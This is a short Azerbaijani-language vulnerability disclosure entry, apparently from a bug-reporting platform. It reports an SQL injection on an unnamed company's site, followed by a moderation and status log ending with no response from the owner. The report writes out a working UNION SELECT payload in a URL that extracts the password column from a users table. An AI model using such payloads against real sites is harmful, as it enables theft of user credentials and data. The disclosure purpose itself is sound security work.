sql injection

Şirkət adı gizlədilib 23 Dekabr 2016, 22:23

Ətraflı məlumat

Saytda SQL İnjection mövcuddur.
Bu boşluqdan istifadə edərək saytda yerləşdirilmiş məlumatları (Parollar, saytın strukturu və s.) əldə etmək olar
Sql inject- siteaddress.com/blog_leftsidebar.php?id=-2%27+union+select+1,sifre,3,4+from+istifadeciler--+-%27

Qeydlər

  • 04 Aprel 2017, 17:27
    Boşluğun statusu
    Mənbədən cavab gəlmədi

  • 05 Yanvar 2017, 19:59
    Boşluğun statusu
    Mənbəyə boşluq haqqında e-poçt göndərildi

  • 03 Yanvar 2017, 17:03
    Boşluğa bal verildi
    Moderator boşluq üçün 10 ballıq qiymətləndirmə sistemi üzrə 7 bal təyin etdi

  • 03 Yanvar 2017, 17:03
    Boşluğun statusu
    Moderator tərəfindən təsdiq edildi

  • 31 Dekabr 2016, 12:53
    Boşluq dəyişdirildi
    Boşluq "sql injection" dəyişdirildi

  • 28 Dekabr 2016, 15:58
    Boşluq imtina edildi
    1. Eger SQL injectiondursa onun unvanini ve usulu yollayim. 2. Eger Admin by pass-dirsa admin qovlughunu yollayin.

  • 23 Dekabr 2016, 22:23
    Boşluq əlavə edildi
    Boşluq BUGemota əlavə edildi